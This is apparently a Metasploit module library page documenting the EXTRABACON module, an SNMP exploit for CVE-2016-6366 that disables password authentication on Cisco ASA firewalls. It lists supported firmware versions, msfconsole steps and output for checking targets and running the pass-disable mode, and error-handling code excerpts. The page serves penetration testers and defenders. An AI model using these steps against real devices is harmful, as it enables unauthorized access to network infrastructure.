Cisco ASA Authentication Bypass (EXTRABACON) - Metasploit
This page contains detailed information about how to use the auxiliary/admin/networking/cisco_asa_extrabacon metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
Source code: modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb
Disclosure date: -
Last modification time: 2021-08-27 17:15:33 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 161
List of CVEs: CVE-2016-6366
This module is also known as EXTRABACON.
This module patches the authentication functions of a Cisco ASA to allow uncredentialed logins. Uses improved shellcode for payload.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > show targets
... a list of targets ...
msf auxiliary(cisco_asa_extrabacon) > set TARGET target-id
msf auxiliary(cisco_asa_extrabacon) > show options
... show and set options ...
msf auxiliary(cisco_asa_extrabacon) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
General notes
This is using improved shellcode, has less stages than the Equation Group version making it more reliable. This makes the SNMP payload packet ~150 less bytes. Also, the leaked version only supports 8.x, we have it working on 9.x versions.
To add more version specific offsets, more details and a Lina file offset finder are available at:
https://github.com/RiskSense-Ops/CVE-2016-6366
Partial list of supported versions
All of the leaked versions are available in the module
- 8.x
- 8.0(2)
- 8.0(3)
- 8.0(3)6
- 8.0(4)
- 8.0(4)32
- 8.0(5)
- 8.2(1)
- 8.2(2)
- 8.2(3)
- 8.2(4)
- 8.2(5)
- 8.2(5)33
*
- 8.2(5)41
*
- 8.3(1)
- 8.3(2)
- 8.3(2)39
*
- 8.3(2)40
*
- 8.3(2)-npe
*
**
- 8.4(1)
- 8.4(2)
- 8.4(3)
- 8.4(4)
- 8.4(4)1
*
- 8.4(4)3
*
- 8.4(4)5
*
- 8.4(4)9
*
- 8.4(6)5
*
- 8.4(7)
*
- 9.x
- 9.0(1)
*
- 9.1(1)4
*
- 9.2(1)
*
- 9.2(2)8
*
- 9.2(3)
*
- 9.2(4)
*
- 9.2(4)13
*
- Start
msfconsole
use auxiliary/admin/networking/cisco_asa_extrabacon
set RHOST x.x.x.x
check
run
- ssh [email protected], you will not need a valid password
set MODE pass-enable
run
- ssh [email protected], ensure fake password does not work
*
new version support not part of the original Shadow Brokers leak
**
We currently can't distinguish between normal and NPE versions from the SNMP strings. We've commented out the
NPE offsets, as NPE is very rare (it is for exporting to places where encryption is crappy), but in the future,
we'd like to incorporate these versions. Perhaps as a bool option?
Verification Steps
Scenarios
Checking for a vulnerable version
msf > use auxiliary/admin/networking/cisco_asa_extrabacon
msf auxiliary(cisco_asa_extrabacon) > set rhost 192.168.1.1
rhost => 192.168.1.1
msf auxiliary(cisco_asa_extrabacon) > check
[+] Payload for Cisco ASA version 8.2(1) available!
[*] 192.168.1.1:161 The target appears to be vulnerable.
Disabling administrative password
msf auxiliary(cisco_asa_extrabacon) > set
set ACTION set ConsoleLogging set Prompt set RHOST set TimestampOutput
set CHOST set LogLevel set PromptChar set RPORT set VERBOSE
set COMMUNITY set MODE set PromptTimeFormat set SessionLogging set VERSION
set CPORT set MinimumRank set RETRIES set TIMEOUT set WORKSPACE
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-
set MODE pass-disable set MODE pass-enable
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-disable
MODE => pass-disable
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed
Re-enabling administrative password
msf auxiliary(cisco_asa_extrabacon) > set MODE pass-enable
MODE => pass-enable
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-enable payload for version 8.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[*] Auxiliary module execution completed
Go back to menu.
Msfconsole Usage
Here is how the admin/networking/cisco_asa_extrabacon auxiliary module looks in the msfconsole:
msf6 > use auxiliary/admin/networking/cisco_asa_extrabacon
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show info
Name: Cisco ASA Authentication Bypass (EXTRABACON)
Module: auxiliary/admin/networking/cisco_asa_extrabacon
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Sean Dillon <[email protected]>
Zachary Harding <[email protected]>
Nate Caroe <[email protected]>
Dylan Davis <[email protected]>
William Webb <[email protected]>
Jeff Jarmoc <jjarmoc>
Equation Group
Shadow Brokers
Available actions:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
PASS_ENABLE Enable password authentication.
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ASAVER auto no Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1), 8
.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 161 yes The target port (UDP)
TIMEOUT 1 yes SNMP Timeout
Description:
This module patches the authentication functions of a Cisco ASA to
allow uncredentialed logins. Uses improved shellcode for payload.
References:
https://nvd.nist.gov/vuln/detail/CVE-2016-6366
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
https://github.com/RiskSense-Ops/CVE-2016-6366
Also known as:
EXTRABACON
Module Options
This is a complete list of options available in the admin/networking/cisco_asa_extrabacon auxiliary module:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show options
Module options (auxiliary/admin/networking/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
ASAVER auto no Target ASA version (default autodetect) (Accepted: auto, 9.2(4)13, 9.2(4), 9.2(3), 9.2(2)8, 9.2(1), 9.1(1)4, 9.0(1), 8.4(7), 8.4(6)5, 8.4(4)9, 8.4(4)5, 8.4(4)3, 8.4(4)1, 8.4(4), 8.4(3), 8.4(2), 8.4(1),
8.3(2)40, 8.3(2)39, 8.3(2), 8.3(1), 8.2(5)41, 8.2(5)33, 8.2(5), 8.2(4), 8.2(3), 8.2(2), 8.2(1), 8.0(5), 8.0(4)32, 8.0(4), 8.0(3)6, 8.0(3), 8.0(2))
COMMUNITY public yes SNMP Community String
RETRIES 1 yes SNMP Retries
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 161 yes The target port (UDP)
TIMEOUT 1 yes SNMP Timeout
Auxiliary action:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
Advanced Options
Here is a complete list of advanced options supported by the admin/networking/cisco_asa_extrabacon auxiliary module:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show advanced
Module advanced options (auxiliary/admin/networking/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the admin/networking/cisco_asa_extrabacon module can do:
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show actions
Auxiliary actions:
Name Description
---- -----------
PASS_DISABLE Disable password authentication.
PASS_ENABLE Enable password authentication.
Evasion Options
Here is the full list of possible evasion options supported by the admin/networking/cisco_asa_extrabacon auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(admin/networking/cisco_asa_extrabacon) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Error: Unable to retrieve version information
- Received Cisco ASA version <VERS_STRING>, but no payload available
- Don't forget to run PASS_ENABLE after logging in!
- set ACTION PASS_ENABLE
- Connection Error: Is the target up?
- SNMP Error: Request Timeout, Cisco ASA may have crashed :/
- SNMP Error: Version 2c is not supported by target.
- Error: No payload available for version <VERS_STRING>
- Error: <E.CLASS> <E> <E.BACKTRACE>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Error: Unable to retrieve version information
Here is a relevant code snippet related to the "Error: Unable to retrieve version information" error message:
106:
107: def check
108: begin
109: vers_string = retrieve_asa_version
110: rescue ::StandardError
111: print_error('Error: Unable to retrieve version information')
112: return Exploit::CheckCode::Unknown
113: end
114:
115: if @offsets[vers_string]
116: print_good("Payload for Cisco ASA version #{vers_string} available!")
Received Cisco ASA version <VERS_STRING>, but no payload available
Here is a relevant code snippet related to the "Received Cisco ASA version <VERS_STRING>, but no payload available" error message:
115: if @offsets[vers_string]
116: print_good("Payload for Cisco ASA version #{vers_string} available!")
117: return Exploit::CheckCode::Appears
118: end
119:
120: print_warning("Received Cisco ASA version #{vers_string}, but no payload available")
121: return Exploit::CheckCode::Detected
122: end
123:
124: def build_payload(vers_string, mode)
125: # adds offsets to the improved shellcode
Don't forget to run PASS_ENABLE after logging in!
Here is a relevant code snippet related to the "Don't forget to run PASS_ENABLE after logging in!" error message:
177: response = snmp.get_bulk(0, 1, [SNMP::VarBind.new(payload)])
178:
179: if response.varbind_list
180: print_good('Clean return detected!')
181: if action.name == 'PASS_DISABLE'
182: print_warning("Don't forget to run PASS_ENABLE after logging in!")
183: print_warning(' set ACTION PASS_ENABLE')
184: end
185: end
186: rescue ::Rex::ConnectionError
187: print_error('Connection Error: Is the target up?')
set ACTION PASS_ENABLE
Here is a relevant code snippet related to the "set ACTION PASS_ENABLE" error message:
178:
179: if response.varbind_list
180: print_good('Clean return detected!')
181: if action.name == 'PASS_DISABLE'
182: print_warning("Don't forget to run PASS_ENABLE after logging in!")
183: print_warning(' set ACTION PASS_ENABLE')
184: end
185: end
186: rescue ::Rex::ConnectionError
187: print_error('Connection Error: Is the target up?')
188: rescue ::SNMP::RequestTimeout
Connection Error: Is the target up?
Here is a relevant code snippet related to the "Connection Error: Is the target up?" error message:
182: print_warning("Don't forget to run PASS_ENABLE after logging in!")
183: print_warning(' set ACTION PASS_ENABLE')
184: end
185: end
186: rescue ::Rex::ConnectionError
187: print_error('Connection Error: Is the target up?')
188: rescue ::SNMP::RequestTimeout
189: print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190: rescue ::SNMP::UnsupportedVersion
191: print_error('SNMP Error: Version 2c is not supported by target.')
192: rescue ::NoMethodError
SNMP Error: Request Timeout, Cisco ASA may have crashed :/
Here is a relevant code snippet related to the "SNMP Error: Request Timeout, Cisco ASA may have crashed :/" error message:
184: end
185: end
186: rescue ::Rex::ConnectionError
187: print_error('Connection Error: Is the target up?')
188: rescue ::SNMP::RequestTimeout
189: print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190: rescue ::SNMP::UnsupportedVersion
191: print_error('SNMP Error: Version 2c is not supported by target.')
192: rescue ::NoMethodError
193: print_error("Error: No payload available for version #{vers_string}")
194: rescue ::Interrupt
SNMP Error: Version 2c is not supported by target.
Here is a relevant code snippet related to the "SNMP Error: Version 2c is not supported by target." error message:
186: rescue ::Rex::ConnectionError
187: print_error('Connection Error: Is the target up?')
188: rescue ::SNMP::RequestTimeout
189: print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190: rescue ::SNMP::UnsupportedVersion
191: print_error('SNMP Error: Version 2c is not supported by target.')
192: rescue ::NoMethodError
193: print_error("Error: No payload available for version #{vers_string}")
194: rescue ::Interrupt
195: raise $ERROR_INFO
196: rescue ::StandardError => e
Error: No payload available for version <VERS_STRING>
Here is a relevant code snippet related to the "Error: No payload available for version <VERS_STRING>" error message:
188: rescue ::SNMP::RequestTimeout
189: print_error('SNMP Error: Request Timeout, Cisco ASA may have crashed :/')
190: rescue ::SNMP::UnsupportedVersion
191: print_error('SNMP Error: Version 2c is not supported by target.')
192: rescue ::NoMethodError
193: print_error("Error: No payload available for version #{vers_string}")
194: rescue ::Interrupt
195: raise $ERROR_INFO
196: rescue ::StandardError => e
197: print_error("Error: #{e.class} #{e} #{e.backtrace}")
198: ensure
Error: <E.CLASS> <E> <E.BACKTRACE>
Here is a relevant code snippet related to the "Error: <E.CLASS> <E> <E.BACKTRACE>" error message:
192: rescue ::NoMethodError
193: print_error("Error: No payload available for version #{vers_string}")
194: rescue ::Interrupt
195: raise $ERROR_INFO
196: rescue ::StandardError => e
197: print_error("Error: #{e.class} #{e} #{e.backtrace}")
198: ensure
199: disconnect_snmp
200: end
201:
202: def retrieve_asa_version
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13750 Merged Pull Request: Centralize networking
References
- CVE-2016-6366
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
- https://github.com/RiskSense-Ops/CVE-2016-6366
See Also
Check also the following modules related to this module:
- auxiliary/admin/networking/cisco_config
- auxiliary/admin/networking/cisco_dcnm_auth_bypass
- auxiliary/admin/networking/cisco_dcnm_download
- auxiliary/admin/networking/cisco_secure_acs_bypass
- auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass
- auxiliary/admin/http/cisco_7937g_ssh_privesc
- auxiliary/admin/networking/arista_config
- auxiliary/admin/networking/brocade_config
- auxiliary/admin/networking/f5_config
- auxiliary/admin/networking/juniper_config
- auxiliary/admin/networking/mikrotik_config
- auxiliary/admin/networking/ubiquiti_config
- auxiliary/admin/networking/vyos_config
- auxiliary/dos/cisco/cisco_7937g_dos
- auxiliary/dos/cisco/cisco_7937g_dos_reboot
- auxiliary/gather/cisco_pvc2300_download_config
- auxiliary/gather/cisco_rv320_config
- auxiliary/scanner/http/cisco_asa_asdm
- auxiliary/scanner/http/cisco_asa_asdm_bruteforce
- auxiliary/scanner/http/cisco_asa_clientless_vpn
- auxiliary/scanner/http/cisco_device_manager
- auxiliary/scanner/http/cisco_directory_traversal
- auxiliary/scanner/http/cisco_firepower_download
- auxiliary/scanner/http/cisco_firepower_login
- auxiliary/scanner/http/cisco_ios_auth_bypass
- auxiliary/scanner/http/cisco_ironport_enum
- auxiliary/scanner/http/cisco_nac_manager_traversal
- auxiliary/scanner/http/cisco_ssl_vpn
- auxiliary/scanner/http/cisco_ssl_vpn_priv_esc
- auxiliary/scanner/ike/cisco_ike_benigncertain
- auxiliary/scanner/misc/cisco_smart_install
- auxiliary/scanner/snmp/cisco_config_tftp
- auxiliary/scanner/snmp/cisco_upload_file
- auxiliary/voip/cisco_cucdm_call_forward
- auxiliary/voip/cisco_cucdm_speed_dials
Authors
- Sean Dillon <[email protected]>
- Zachary Harding <[email protected]>
- Nate Caroe <[email protected]>
- Dylan Davis <[email protected]>
- William Webb <william_webb[at]rapid7.com>
- Jeff Jarmoc <jjarmoc>
- Equation Group
- Shadow Brokers
Version
This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.